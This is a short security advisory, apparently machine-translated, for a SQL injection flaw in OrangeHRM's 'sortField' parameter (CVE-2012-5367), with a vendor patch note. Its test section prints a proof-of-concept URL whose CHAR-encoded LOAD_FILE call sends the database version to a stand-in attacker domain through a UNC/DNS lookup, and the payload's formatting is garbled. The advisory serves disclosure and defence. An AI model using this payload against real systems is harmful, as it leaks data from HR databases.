OrangeHRM 'sortfield 'parameter SQL Injection Vulnerability

Release date:
Updated on:

Affected Systems:
OrangeHRM 2.7.1-rc.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56417
Cve id: CVE-2012-5367
 
OrangeHRM is a comprehensive human resource management (HRM) system. It implements some important HR functions required by any enterprise.
 
OrangeHRM 2.7.1-rc.1 and other versions have the SQL injection vulnerability. Attackers can exploit this vulnerability to control applications, access or modify data, and exploit other vulnerabilities in lower-level databases.
 
<* Source: High-Tech Bridge Security Research Lab
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/symfony/web/index.php/admin/viewCustomers? SortOrder = ASC & amp; sortField = (select

Load_file (CONCAT (CHAR (92), CHAR (92), (select version (), CHAR (46), CHAR (97), CHAR (116 ), CHAR (116), CHAR (97), CHAR
 
(99), CHAR (107), CHAR (101), CHAR (114), cha r (46), CHAR (99), CHAR (111), CHAR (109 ), CHAR (92), CHAR (102), CHAR (111), CHAR
 
(111), CHAR (98), CHAR (97), CHAR (114 ))))

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
OrangeHRM
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Www.orangehrm.com/